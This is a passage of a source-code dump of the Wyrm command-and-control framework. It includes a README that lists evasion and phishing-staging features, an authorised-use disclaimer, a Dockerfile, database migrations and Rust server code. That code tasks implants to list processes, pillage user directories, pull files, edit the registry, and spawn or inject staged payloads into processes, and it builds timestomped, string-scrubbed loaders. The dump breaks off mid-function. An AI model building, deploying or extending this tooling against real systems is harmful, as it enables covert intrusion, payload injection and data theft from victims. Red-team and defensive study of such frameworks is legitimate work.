- Easy mechanism to stage files (such as built implants, PDF, zip, etc) on the C2 for download to support phishing campaigns and initial attack vectors
- Supports native Windows API commands, more planned in future updates
- Easy to use terminal client for the operator to task & inspect agents, and to manage staged resources
- Implant uses the most common User-Agent for comms to help it blend in covertly with traffic by default, this is also configurable to suit your engagement
- Easy, automated C2 infrastructure deployment with docker
- Execute dotnet binaries in memory
- Anti-sandbox techniques which are highly configurable by the operator through profiles
- Backed by a database, fully timestamped to make reporting easier
- Proxy awareness (usable against clients who use proxies)

This project is not currently accepting contributions, please **raise issues** or use **GitHub Discussions** and I will look into them, and help
answer any questions.

### Loader

The Wyrm C2 comes with a loader for the reflective DLL component of the toolkit. The loader has the Wyrm postex payload encrypted in its 
.text section; for more information please see the [docs](https://docs.wyrm-c2.com/implant/rdll.html). Visually the loader runs as follows:

![Wyrm reflective DLL loader](resources/inj.svg)

### Updates

**WARNING:** Before pulling an update; please check the [release notes](https://github.com/0xflux/Wyrm/blob/master/RELEASE_NOTES.md) to see whether there are any breaking changes - for example if the
**configurable C2 profile** changes in a breaking way from a previous profile you have, you will want to make sure you backup and migrate
your profile. I will be excluding `/c2/profiles/*` and `.env` from git once the project is published in pre-release to prevent accidentally overwriting
your previous profile when running `git pull` to update your software.

As per the roadmap, this project will see significant development over the next 12 months. To pull updates, whether they are new features
or bug fixes, you simply just do a **git pull**, re-build via docker: `docker compose up -d --build c2` and `docker compose up -d --build client`.

# The legal bit

## Authorized Use Only

**Permitted Users**

The Software is intended **exclusively** for **authorised** penetration testers, Red Teams, Purple Teams, hobbyists, and security researchers who have obtained **explicit, written authorisation from the owner of each target system**.

Any use of the Software on systems for which you do not hold such authorisation is **strictly prohibited** and may constitute a criminal offence under the UK Computer Misuse Act 1990 (including sections on Unauthorised access to computer material, Unauthorised access with intent to commit further offences, and Unauthorised acts impairing operation) or equivalent laws elsewhere.

## Prohibited Conduct
You must not use, distribute, or facilitate use of the Software for:

- Unauthorised Access (CMA 1990, Section 1) — hacking into systems or accounts without permission.
- Unauthorised Modification (CMA 1990, Section 3) — altering, deleting, or corrupting data or programs you have no right to modify.
- Denial-of-Service (CMA 1990, Section 3A) — disrupting or interrupting any service, network, or application.
- Malware/Ransomware Creation — writing, incorporating, or deploying code intended to extort, damage, or hold data hostage.
- Any other malicious, unlawful, or harmful activities.

Or equivalent offenses in other jurisdictions.

**No Encouragement of Misuse:**

The Author expressly **does not condone, support, or encourage** any illegal or malicious activity. This Software is provided purely for legitimate security-testing purposes, in environments where full authorisation has been granted.

## Compliance with Laws & Regulations

**Local Laws**: You alone are responsible for ensuring your use of the Software complies with all applicable local, national, and international laws, regulations, and corporate policies.

## No Warranty

The Software is provided “as is” and “as available”, without warranties of any kind, express or implied.

We make no warranty of merchantability, fitness for a particular purpose, or non-infringement.

We do not warrant that the Software is error-free, secure, or uninterrupted.

## Limitation of Liability

To the fullest extent permitted by law, neither the Author nor contributors shall be liable for any:

- Direct, indirect, incidental, special, punitive, or consequential damages.
- Loss of revenue, profits, data, or goodwill.
- Costs of procurement of substitute goods or services.

This limitation applies even if we have been advised of the possibility of such damages. It is the responsibility of the professional operator to
use this tool safely.

================================================
FILE: c2/Cargo.toml
================================================
[package]
name = "c2"
version = "0.1.0"
edition = "2024"

[dependencies]
shared = { path = "../shared" }
axum = { version = "0.8", features = ["macros", "multipart"] }
serde = "1.0"
tokio = { version = "1.43", features = ["full"] }
serde_json = "1"
dotenvy = "0.15.7"
sqlx = { version = "0.8", features = ["postgres", "runtime-tokio-native-tls", "migrate"] }
chrono = { version = "0.4", features = ["serde"] }
shared_c2_client ={ path = "../shared_c2_client" }
tokio-util = {version = "0.7.15", features = ["io"] }
http-body-util = "0.1.3"
rand = "0.9.1"
base64 = "0.22.1"
rust-crypto = "0.2.36"
futures = "0.3"
toml = "0.9.6"
thiserror = "2.0"
tower-http = { version = "0.6", features = ["cors", "catch-panic"]}
axum-extra = { version = "0.12.0", features = ["cookie"] }


================================================
FILE: c2/Dockerfile
================================================
FROM lukemathwalker/cargo-chef:latest-rust-1.90-bookworm AS chef
WORKDIR /app

FROM chef AS planner
WORKDIR /app
COPY . .
RUN cargo chef prepare --recipe-path recipe.json

FROM chef AS builder 
WORKDIR /app

COPY --from=planner /app/recipe.json ./recipe.json
RUN cargo +nightly chef cook --release -p c2 --recipe-path recipe.json
COPY . .
RUN cargo +nightly build -p c2 --release

FROM rust:1.90-bookworm AS runtime

RUN echo "Installing environment dependencies..."
RUN apt update -qq
RUN apt install -qq -y build-essential \
    pkg-config libssl-dev gcc-mingw-w64-x86-64 \
    g++-mingw-w64-x86-64 curl libgtk-3-dev clang p7zip-full \ 
    clang lld llvm

RUN set -eux; \
    if command -v llvm-lib-14   >/dev/null 2>&1; then ln -sf /usr/bin/llvm-lib-14   /usr/bin/llvm-lib; fi; \
    if command -v ld.lld        >/dev/null 2>&1; then ln -sf /usr/bin/ld.lld        /usr/bin/lld-link; fi; \
    if command -v clang         >/dev/null 2>&1; then ln -sf /usr/bin/clang         /usr/bin/clang-cl; fi

RUN echo "Installing toolchains..."
RUN rustup toolchain install nightly && rustup component add llvm-tools

RUN rustup target add x86_64-pc-windows-msvc
RUN rustup target add x86_64-pc-windows-msvc --toolchain nightly
RUN cargo install cargo-xwin

RUN rustup override set nightly

EXPOSE 8087
WORKDIR /app
VOLUME ["/data"]

COPY --from=builder /app/target/release/c2 .
COPY --from=builder /app/c2/profiles/ ./profiles
COPY --from=builder /app/implant/ ./implant/
COPY --from=builder /app/shared_no_std/ ./shared_no_std/
COPY --from=builder /app/shared/ ./shared/
COPY --from=builder /app/loader/ ./loader/

RUN mkdir -p /app/implant/.tmp
ENV TMPDIR=/app/implant/.tmp

ENTRYPOINT ["/app/c2"]

================================================
FILE: c2/Readme.md
================================================
# C2

Before using the C2, you **SHOULD** change the default admin token and database creds found in the `../.env` for security purposes.

## TLDR

- As above, edit the `../.env` file to use your own creds - this is for security purposes.
- To run the C2, from the root directory (`../`) run `docker compose up -d --build c2`. On first run this may take a few minutes.
- To connect to the C2, you should use the client which can be run via: `docker compose up -d --build client` and is served on port 4040 by default.
- The C2 uses a docker volume `/data` to store loot as well as other persistent files.

## Info

The C2 module handles only the command and control server implementation and does not deal with showing a GUI as output.
That is handled by the `client` crate which you can run via docker.

The C2 has logging for API endpoint access attempts, errors, and login's. **Note** there is no in-built log rotation, so you may wish to use
the linux `logrotate` application to manage these.

- `Logins`
  - This log file is managed in such a way repeat successful logins will not be recorded by an IP, only the first successful login
  - This will log all cases where an IP makes repeated failed logins
  - This log can be disabled via the `.env` file, adding: `DISABLE_ACCESS_LOG=1`.
  - The log file will show (by default) the plaintext password of **unsuccessful logins** for intelligence gain, this is entirely dependant upon your threat model. To turn this feature off, add `DISABLE_PLAINTXT_PW_BAD_LOGIN=1` to your `.env`.
- `Access`
  - This log could get unwieldy and it can be disabled through the C2 `.env` file, by adding `DISABLE_ACCESS_LOG=1`. This will record all visits to endpoint URI's and record if the access was legitimate (from an agent) or not (scanners, researchers, etc). It is enabled by default and you should consider manually pruning the log, or automating with `logrotate`
- `Error`
  - A simple log file which shows C2 error messages to assist in bug reporting / debugging
  - This log file cannot be disabled


================================================
FILE: c2/migrations/20250614124105_agent_table.sql
================================================
-- Add migration script here
CREATE TABLE agents (
    id SERIAL PRIMARY KEY,
    first_check_in TIMESTAMPTZ DEFAULT now()
);

================================================
FILE: c2/migrations/20250614124140_add_sleep.sql
================================================
ALTER TABLE agents ADD COLUMN sleep BIGINT;

================================================
FILE: c2/migrations/20250614132037_tasks.sql
================================================
-- Add migration script here
CREATE TABLE tasks (
    id SERIAL PRIMARY KEY,
    uid TEXT NOT NULL,
    data TEXT
);

================================================
FILE: c2/migrations/20250615070633_flesh_table.sql
================================================
-- Add migration script here
ALTER TABLE tasks
  ADD COLUMN completed   BOOLEAN    NOT NULL DEFAULT FALSE,
  ADD COLUMN agent_id    INTEGER    NOT NULL,
  ADD CONSTRAINT fk_tasks_agent
    FOREIGN KEY (agent_id)
    REFERENCES agents (id)
    ON DELETE CASCADE;

CREATE INDEX idx_tasks_incomplete
  ON tasks (agent_id)
  WHERE completed = FALSE;

================================================
FILE: c2/migrations/20250615072852_add_col_back_tasks.sql
================================================
-- Add migration script here
ALTER TABLE tasks
  ADD COLUMN command_id INT;

================================================
FILE: c2/migrations/20250615085223_add_uid.sql
================================================
-- Add migration script here
ALTER TABLE agents
  ADD COLUMN uid TEXT;

================================================
FILE: c2/migrations/20250615085245_add_uid.sql
================================================
-- Add migration script here


================================================
FILE: c2/migrations/20250615211204_rm_col_from_tasks.sql
================================================
-- Add migration script here
ALTER TABLE public.tasks
  DROP COLUMN IF EXISTS uid;

================================================
FILE: c2/migrations/20250616171233_ch_col.sql
================================================
-- Add migration script here
BEGIN;

ALTER TABLE tasks
  DROP CONSTRAINT IF EXISTS fk_tasks_agent;
DROP INDEX IF EXISTS idx_tasks_incomplete;

ALTER TABLE agents
  ADD CONSTRAINT uq_agents_uid UNIQUE(uid);

ALTER TABLE tasks
  ADD COLUMN new_agent_id TEXT NOT NULL DEFAULT '';

UPDATE tasks
SET new_agent_id = agents.uid
FROM agents
WHERE tasks.agent_id = agents.id;

ALTER TABLE tasks
  DROP COLUMN agent_id;
ALTER TABLE tasks
  RENAME COLUMN new_agent_id TO agent_id;

ALTER TABLE tasks
  ADD CONSTRAINT fk_tasks_agent
    FOREIGN KEY (agent_id)
    REFERENCES agents(uid)
    ON DELETE CASCADE;

CREATE INDEX idx_tasks_incomplete 
  ON tasks (agent_id)
  WHERE completed = FALSE;

COMMIT;

================================================
FILE: c2/migrations/20250619055731_results_table.sql
================================================
-- Add migration script here
CREATE TABLE completed_tasks (
    id SERIAL PRIMARY KEY,
    task_id INT NOT NULL,
    result TEXT,
    client_pulled_update BOOLEAN NOT NULL DEFAULT FALSE,
    time_completed TIMESTAMPTZ NOT NULL DEFAULT now()
);

================================================
FILE: c2/migrations/20250621175632_add_time.sql
================================================
-- Add migration script here
ALTER TABLE agents
  ADD COLUMN last_check_in TIMESTAMPTZ DEFAULT now();

================================================
FILE: c2/migrations/20250621180355_add_time.sql
================================================
-- Add migration script here


================================================
FILE: c2/migrations/20250622075242_agent_staging.sql
================================================
-- Add migration script here
CREATE TABLE agent_staging (
    id SERIAL PRIMARY KEY,
    date_added TIMESTAMPTZ DEFAULT now(),
    agent_name TEXT NOT NULL,
    host TEXT NOT NULL,
    c2_endpoint TEXT NOT NULL,
    staged_endpoint TEXT NOT NULL,
    sleep_time INT NOT NULL
);

================================================
FILE: c2/migrations/20250622080004_protect_staging.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
    ADD CONSTRAINT uq_agent_name UNIQUE (agent_name),
    ADD CONSTRAINT uq_c2_endpoint UNIQUE (c2_endpoint),
    ADD CONSTRAINT uq_staged_endpoint UNIQUE (staged_endpoint);

================================================
FILE: c2/migrations/20250622080748_remove_constraint.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  DROP CONSTRAINT IF EXISTS uq_c2_endpoint;

================================================
FILE: c2/migrations/20250622083052_add_col_staging.sql
================================================
-- Add migration script here
ALTER TABLE agents
  ADD COLUMN pe_name TEXT;

UPDATE agents
  SET pe_name = 'oops'
  WHERE pe_name IS NULL;

ALTER TABLE agents
  ALTER COLUMN pe_name SET NOT NULL;

================================================
FILE: c2/migrations/20250622094131_add_col_staging_again.sql
================================================
ALTER TABLE agent_staging
  ADD COLUMN pe_name TEXT NOT NULL;

================================================
FILE: c2/migrations/20250622094232_del_col_agent.sql
================================================
-- Add migration script here
ALTER TABLE agents DROP COLUMN pe_name;

================================================
FILE: c2/migrations/20250622122051_protect_pe_name.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
    ADD CONSTRAINT uq_pe_name UNIQUE (pe_name);

================================================
FILE: c2/migrations/20250622130349_port_to_agent_staging.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  ADD COLUMN port INT NOT NULL;

================================================
FILE: c2/migrations/20250622154423_operator_table.sql
================================================
-- Add migration script here
CREATE TABLE operators (
    id SERIAL PRIMARY KEY,
    date_created TIMESTAMPTZ DEFAULT now(),
    username TEXT NOT NULL,
    password_hash TEXT NOT NULL,
    salt TEXT NOT NULL
);

================================================
FILE: c2/migrations/20250622161952_db_add_cstr.sql
================================================
-- Add migration script here
ALTER TABLE operators
    ADD CONSTRAINT uq_username_operator UNIQUE (username);

================================================
FILE: c2/migrations/20250624164511_col_for_toks.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  ADD COLUMN security_token TEXT NOT NULL;

================================================
FILE: c2/migrations/20250627184526_default_env.sql
================================================
-- actually, not needed

================================================
FILE: c2/migrations/20250712164452_update_field_for_sleep.sql
================================================
ALTER TABLE agent_staging
  ALTER COLUMN sleep_time TYPE BIGINT;

================================================
FILE: c2/migrations/20250712164815_update_field_for_prt.sql
================================================
ALTER TABLE agent_staging
  ALTER COLUMN port TYPE INT;

================================================
FILE: c2/migrations/20250712165040_update_field_for_prt_again.sql
================================================
ALTER TABLE agent_staging
  ALTER COLUMN port TYPE SMALLINT;

================================================
FILE: c2/migrations/20250719090503_rm_constraint_upload.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  DROP CONSTRAINT IF EXISTS uq_agent_name;

================================================
FILE: c2/migrations/20250727101559_xor_payload.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
  ADD COLUMN xor_key smallint DEFAULT 0;

================================================
FILE: c2/migrations/20251025085314_update_time_completed_field.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks
ALTER COLUMN time_completed DROP DEFAULT;

================================================
FILE: c2/migrations/20251026120715_change_dt_field.sql
================================================
-- Add migration script here
-- ALTER TABLE completed_tasks
-- ALTER COLUMN time_completed TYPE BIGINT
-- USING time_completed::bigint;

================================================
FILE: c2/migrations/20251026121136_change_dt_field_2.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks
ADD COLUMN time_completed_ms BIGINT NOT NULL
    DEFAULT ((EXTRACT(EPOCH FROM now()) * 1000)::BIGINT);

UPDATE completed_tasks
SET time_completed_ms = ((EXTRACT(EPOCH FROM time_completed) * 1000)::BIGINT)
WHERE time_completed IS NOT NULL;

================================================
FILE: c2/migrations/20251026122000_time_comp_rm.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks DROP COLUMN time_completed;

================================================
FILE: c2/migrations/20251026144632_add_agent_id_to_ct.sql
================================================
-- Add migration script here
ALTER TABLE completed_tasks
    ADD COLUMN agent_id TEXT;

ALTER TABLE completed_tasks
    ADD COLUMN command_id INT;

================================================
FILE: c2/migrations/20251119185937_add_pulled_col.sql
================================================
-- Add migration script here
ALTER TABLE tasks
  ADD COLUMN fetched BOOL;

================================================
FILE: c2/migrations/20251127184944_download_col.sql
================================================
-- Add migration script here
ALTER TABLE agent_staging
    ADD COLUMN num_downloads INT NOT NULL DEFAULT 0;

================================================
FILE: c2/migrations/20251127193415_make_bigint.sql
================================================
ALTER TABLE agent_staging
    ALTER COLUMN num_downloads TYPE BIGINT;

ALTER TABLE agent_staging
    ALTER COLUMN num_downloads SET DEFAULT 0;

================================================
FILE: c2/migrations/20251207091938_beacon_console_line.sql
================================================
-- Add migration script here
INSERT INTO agents (uid, sleep)
VALUES ('doesntmatterwhatthisis', 1);

================================================
FILE: c2/migrations/20251207092341_testagent.sql
================================================
-- Add migration script here
INSERT INTO tasks (agent_id, fetched)
VALUES ('doesntmatterwhatthisis', false);

================================================
FILE: c2/migrations/20251215120000_completed_tasks_pending_idx.sql
================================================
-- Add migration script here
CREATE INDEX IF NOT EXISTS idx_completed_tasks_agent_pending
  ON completed_tasks (agent_id)
  WHERE client_pulled_update = FALSE;



================================================
FILE: c2/migrations/20251215123000_tasks_fetched_default.sql
================================================
-- Add migration script here
UPDATE tasks
SET fetched = FALSE
WHERE fetched IS NULL;

ALTER TABLE tasks
    ALTER COLUMN fetched SET DEFAULT FALSE;

ALTER TABLE tasks
    ALTER COLUMN fetched SET NOT NULL;


================================================
FILE: c2/src/admin_task_dispatch/dispatch_table.rs
================================================
use std::sync::Arc;

use crate::{
    admin_task_dispatch::{
        delete_staged_resources, drop_file_handler,
        execute::{SpawnInject, dotex, spawn_inject_with_network_resource},
        export_completed_tasks_to_json,
        implant_builder::stage_file_upload_from_users_disk,
        list_agents, list_staged_resources, remove_agent_from_list, show_server_time, task_agent,
        task_agent_sleep,
    },
    app_state::AppState,
    logging::log_error_async,
};
use axum::extract::State;
use serde_json::Value;
use shared::tasks::{AdminCommand, Command};

/// Main dispatcher for admin commands issued on the server, which may, or may not, include an
/// implant UID.
pub async fn admin_dispatch(
    uid: Option<String>,
    command: AdminCommand,
    state: State<Arc<AppState>>,
) -> Vec<u8> {
    // Note, due to the use of generics with the function `task_agent`, if you are passing `None`
    // into the function, you will have to turbofish a type which does implement ToString - so,
    // to keep it simple, just turbofish String - it will be discarded as the `None` path will be
    // taken
    let result: Option<Value> = match command {
        AdminCommand::Sleep(time) => task_agent_sleep(time, uid.unwrap(), state).await,
        AdminCommand::ListAgents => list_agents(state).await,
        AdminCommand::ListProcesses => {
            task_agent::<String>(Command::Ps, None, uid.unwrap(), state).await
        }
        AdminCommand::GetUsername => todo!(),
        AdminCommand::ListUsersDirs => {
            task_agent::<String>(Command::Pillage, None, uid.unwrap(), state).await
        }
        AdminCommand::Pwd => task_agent::<String>(Command::Pwd, None, uid.unwrap(), state).await,
        AdminCommand::Cd(path_buf) => {
            task_agent(Command::Cd, Some(path_buf), uid.unwrap(), state).await
        }
        AdminCommand::KillAgent => {
            task_agent::<String>(Command::KillAgent, None, uid.unwrap(), state).await
        }
        AdminCommand::Ls => task_agent::<String>(Command::Ls, None, uid.unwrap(), state).await,
        AdminCommand::ShowServerTime => show_server_time(),
        AdminCommand::Login => Some(serde_json::to_value("success").unwrap()),
        AdminCommand::ListStagedResources => list_staged_resources(state).await,
        AdminCommand::Run(args) => task_agent(Command::Run, Some(args), uid.unwrap(), state).await,
        AdminCommand::DeleteStagedResource(download_endpoint) => {
            delete_staged_resources(state, download_endpoint).await
        }
        AdminCommand::RemoveAgentFromList => remove_agent_from_list(state, uid.unwrap()).await,
        AdminCommand::Undefined => panic!("This should never happen."),
        AdminCommand::StageFileOnC2(metadata) => {
            stage_file_upload_from_users_disk(metadata, state).await
        }
        AdminCommand::KillProcessById(pid) => {
            task_agent::<String>(Command::KillProcess, Some(pid), uid.unwrap(), state).await
        }
        AdminCommand::Drop(data) => drop_file_handler(uid, data, state).await,
        AdminCommand::Copy(inner) => {
            // Serialise the (String, String) to just a String so we can use it with the
            // generic task_agent.
            let inner_serialised = match serde_json::to_string(&inner) {
                Ok(s) => Some(s),
                Err(e) => {
                    log_error_async(&e.to_string()).await;
                    None
                }
            };

            if inner_serialised.is_some() {
                task_agent::<String>(Command::Copy, inner_serialised, uid.unwrap(), state).await
            } else {
                None
            }
        }
        AdminCommand::Move(inner) => {
            // Serialise the (String, String) to just a String so we can use it with the
            // generic task_agent.
            let inner_serialised = match serde_json::to_string(&inner) {
                Ok(s) => Some(s),
                Err(e) => {
                    log_error_async(&e.to_string()).await;
                    None
                }
            };

            if inner_serialised.is_some() {
                task_agent::<String>(Command::Move, inner_serialised, uid.unwrap(), state).await
            } else {
                // Error logged in above failure path
                None
            }
        }
        AdminCommand::Pull(file_path) => {
            task_agent(Command::Pull, Some(file_path), uid.unwrap(), state).await
        }
        AdminCommand::BuildAllBins(_) => None,
        AdminCommand::RegQuery(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RegQuery, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RegAdd(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RegAdd, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RegDelete(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RegDelete, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RmFile(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RmFile, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::RmDir(data) => match serde_json::to_string(&data) {
            Ok(s) => task_agent(Command::RmDir, Some(s), uid.unwrap(), state).await,
            Err(e) => {
                log_error_async(&e.to_string()).await;
                None
            }
        },
        AdminCommand::ExportDb => export_completed_tasks_to_json(uid.unwrap(), state).await,
        AdminCommand::None => None,
        AdminCommand::DotEx(dot_ex_inner) => dotex(uid, dot_ex_inner, state.clone()).await,
        AdminCommand::WhoAmI => {
            task_agent::<String>(Command::WhoAmI, None, uid.unwrap(), state).await
        }
        AdminCommand::Spawn(download_name) => {
            spawn_inject_with_network_resource(
                uid,
                SpawnInject::Spawn(download_name),
                state.clone(),
            )
            .await
        }
        AdminCommand::StaticWof(name) => {
            task_agent::<String>(Command::StaticWof, Some(name), uid.unwrap(), state).await
        }
        AdminCommand::Inject(inject_inner) => {
            spawn_inject_with_network_resource(
                uid,
                SpawnInject::Inject(inject_inner),
                state.clone(),
            )
            .await
        }
    };

    serde_json::to_vec(&result).unwrap()
}


================================================
FILE: c2/src/admin_task_dispatch/execute.rs
================================================
use std::{path::PathBuf, sync::Arc};

use axum::extract::State;
use serde_json::Value;
use shared::{
    task_types::DotExDataForImplant,
    tasks::{Command, DotExInner, InjectInnerForAdmin, InjectInnerForPayload},
};

use crate::{
    TOOLS_PATH, admin_task_dispatch::task_agent, app_state::AppState, logging::log_error_async,
};

/// Executes dotnet in the current process
pub async fn dotex(
    uid: Option<String>,
    data: DotExInner,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    let mut path_to_tool = PathBuf::from(TOOLS_PATH);
    path_to_tool.push(data.tool_path);

    // Read the tool, ret an error wrapped in an Option if it happens.. I regret this pattern rn
    let tool_data = match tokio::fs::read(path_to_tool).await {
        Ok(f) => f,
        Err(e) => {
            let msg = format!("Could not read file. {e}");
            log_error_async(&msg).await;
            return Some(serde_json::to_value(msg).unwrap());
        }
    };

    let metadata: DotExDataForImplant = (tool_data, data.args);
    let meta_ser = serde_json::to_string(&metadata).unwrap();

    let _ = task_agent(Command::DotEx, Some(meta_ser), uid.unwrap(), state).await;

    None
}

type InternalName = String;

/// Options for preparing the delivery of the inject inner payload
pub enum SpawnInject {
    Spawn(InternalName),
    /// Inject options include the pid
    Inject(InjectInnerForAdmin),
}

pub async fn spawn_inject_with_network_resource(
    uid: Option<String>,
    type_of: SpawnInject,
    state: State<Arc<AppState>>,
) -> Option<Value> {
    let state_cl = state.clone();
    let endpoints = {
        let tmp = state_cl.endpoints.read().await;
        tmp.clone()
    };

    let internal_name = match type_of {
        SpawnInject::Spawn(ref s) => &s,
        SpawnInject::Inject(ref inject_inner_for_admin) => &inject_inner_for_admin.download_name,
    };

    let file_data = match endpoints
        .read_staged_file_by_file_name(&internal_name)
        .await
    {
        Ok(buf) => buf,
        Err(e) => {
            let msg = format!("Failed to read file data for spawn/inject. {}", e);
            log_error_async(&msg).await;
            return None;
        }
    };

    drop(endpoints);

    match type_of {
        SpawnInject::Spawn(_) => {
            let ser = match serde_json::to_string(&file_data) {
                Ok(s) => s,
                Err(e) => {
                    let msg = format!("Failed to serialise file data for spawn/inject. {}", e);
                    log_error_async(&msg).await;
                    return None;
                }
            };

            task_agent::<String>(Command::Spawn, Some(ser), uid.unwrap(), state).await
        }
        SpawnInject::Inject(inner) => {
            let constructed_for_wyrm = InjectInnerForPayload {
                payload_bytes: file_data,
                pid: inner.pid,
            };

            let ser = match serde_json::to_string(&constructed_for_wyrm) {
                Ok(s) => s,
                Err(e) => {
                    let msg = format!("Failed to serialise file data for spawn/inject. {}", e);
                    log_error_async(&msg).await;
                    return None;
                }
            };

            task_agent::<String>(Command::Inject, Some(ser), uid.unwrap(), state).await
        }
    }
}


================================================
FILE: c2/src/admin_task_dispatch/implant_builder.rs
================================================
use std::{
    env::current_dir,
    fs::create_dir_all,
    path::{Path, PathBuf},
    sync::Arc,
};

use axum::extract::State;
use serde_json::Value;
use shared::tasks::{FileUploadStagingFromClient, NewAgentStaging, StageType, WyrmResult};
use tokio::{
    fs,
    io::{self, AsyncReadExt},
};

use crate::{
    FILE_STORE_PATH, WOFS_PATH,
    admin_task_dispatch::{
        add_api_endpoint_for_staged_resource, is_download_staging_url_error, remove_dir,
        remove_file,
    },
    app_state::AppState,
    logging::log_error_async,
    pe_utils::{scrub_strings, timestomp_binary_compile_date},
    profiles::{Profile, parse_exports_to_string_for_env},
};

const FULLY_QUAL_PATH_TO_FILE_BUILD: &str = "/app/profiles/tmp";

/// Builds all binaries from a given profile
///
/// On success, this function returns None, otherwise an Error is encoded within a `Value` as a `WyrmResult`
pub async fn build_all_bins(
    implant_profile_name: &String,
    state: State<Arc<AppState>>,
) -> Result<Vec<u8>, String> {
    // Save into tmp within profiles, we will delete it on completion.
    let save_path = PathBuf::from("./profiles/tmp");

    create_dir_all(&save_path).map_err(|e| {
        format!(
            "Failed to create tmp directory on c2 for profile staging. {}",
            e.kind()
        )
    })?;

    let profile = {
        // We use the saved profile in memory
        let guard = state.profile.read().await;
        (*guard).clone()
    };

    //
    // If we are building all binaries, iterate through them, otherwise just build hte specified one
    //
    if implant_profile_name.to_lowercase() == "all" {
        let keys: Vec<String> = profile.implants.keys().cloned().collect();
        for key in keys {
            write_implant_to_tmp_folder(&profile, &save_path, &key, state.clone()).await?;
        }
    } else {
        write_implant_to_tmp_folder(&profile, &save_path, implant_profile_name, state.clone())
            .await?;
    }

    //
    // Finally zip up the result, and return them back to the user.
    //
    const ZIP_OUTPUT_PATH: &str = "./profiles/tmp.7z";
    let mut cmd = tokio::process::Command::new("7z");
    cmd.args([
        "a",
        ZIP_OUTPUT_PATH,
        &format!("{}", save_path.as_os_str().display()),
    ]);

    if let Err(e) = cmd.output().await {
        let msg = format!("Error creating 7z archive with resulting payloads. {e}");
        let _ = remove_dir(&save_path).await?;

        return Err(msg);
    };

    //
    // At this point, we have created the 7z. We now want to read it into a buffer in memory,
    // delete the archive, then return the buffer back to the user. We will send it through as a
    // byte stream, which the client can then re-interpret as a file download.
    //
    let _ = remove_dir(&save_path).await?;

    let mut buf = Vec::new();
    let mut file = match tokio::fs::File::open(ZIP_OUTPUT_PATH).await {
        Ok(f) => f,
        Err(e) => {
            let msg = format!("Error opening 7z file. {e}");
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        }
    };

    if let Err(e) = file.read_to_end(&mut buf).await {
        let msg = format!("Error reading 7z file. {e}");
        let _ = remove_dir(&save_path).await?;

        return Err(msg);
    }

    remove_file(ZIP_OUTPUT_PATH).await?;

    Ok(buf)
}

async fn write_loader_to_tmp(
    profile: &Profile,
    save_path: &PathBuf,
    implant_profile_name: &str,
    dll_path: &PathBuf,
) -> Result<(), String> {
    let data: NewAgentStaging = match profile.as_staged_agent(implant_profile_name, StageType::All)
    {
        WyrmResult::Ok(d) => d,
        WyrmResult::Err(e) => {
            let _ = remove_dir(&save_path).await?;
            let msg = format!("Error constructing a NewAgentStaging. {e:?}");
            log_error_async(&msg).await;
            return Err(msg);
        }
    };

    //
    // For every build type, build it - we manually specify the loop size here so as more
    // build options are added, the loop will need to be increased to accommodate.
    //
    for i in 0..3 {
        let stage_type = match i {
            0 => StageType::Exe,
            1 => StageType::Dll,
            2 => StageType::Svc,
            _ => unreachable!(),
        };

        let cmd_build_output = compile_loader(&data, stage_type, dll_path).await;
        if let Err(e) = cmd_build_output {
            let msg = &format!("Failed to build loader. {e}");
            let _ = remove_dir(&save_path).await?;
            return Err(msg.to_owned());
        }

        let output = cmd_build_output.unwrap();
        if !output.status.success() {
            let msg = &format!(
                "Failed to build loader. {:#?}",
                String::from_utf8_lossy(&output.stderr),
            );

            let _ = remove_dir(&save_path).await?;

            return Err(msg.to_owned());
        }

        //
        // Move the built implant to where the operator requested it to be built in
        //
        let src_dir = if cfg!(windows) {
            PathBuf::from(format!("./loader/target/release"))
        } else {
            PathBuf::from(format!("./loader/target/x86_64-pc-windows-msvc/release"))
        };

        let out_dir = Path::new(&save_path);
        let src = match stage_type {
            StageType::Dll => src_dir.join("loader.dll"),
            StageType::Exe => src_dir.join("loader.exe"),
            StageType::Svc => src_dir.join("loader_svc.exe"),
            StageType::All => unreachable!(),
        };

        // Format each output file name as loader_{profile name from toml}
        let ldr_name_fmt = format!("loader_{}", data.pe_name);
        let mut dest = out_dir.join(ldr_name_fmt);

        if !(match stage_type {
            StageType::Dll => dest.add_extension("dll"),
            StageType::Exe => dest.add_extension("exe"),
            StageType::Svc => dest.add_extension("svc"),
            StageType::All => unreachable!(),
        }) {
            let msg = format!("Failed to add extension to local file. {dest:?}");
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        // Error check..
        if let Err(e) = tokio::fs::rename(&src, &dest).await {
            let cwd = current_dir().expect("could not get cwd");
            let msg = format!(
                "Failed to rename built loader - it is *possible* you interrupted the request/page, looking for: {}, to rename to: {}. Cwd: {cwd:?} {e}",
                src.display(),
                dest.display()
            );
            let _ = remove_dir(&save_path).await?;

            return Err(msg);
        };

        // Apply relevant transformations to the loader too
        post_process_pe_on_disk(&dest, &data, stage_type).await;
    }

    Ok(())
}

async fn compile_loader(
    data: &NewAgentStaging,
    stage_type: StageType,
    dll_path: &Path,
) -> Result<std::process::Output, std::io::Error> {
    if stage_type == StageType::All {
        return Err(io::Error::other("StageType::All not supported"));
    }

    let build_as_flags = match stage_type {
        StageType::Dll => vec!["--lib"],
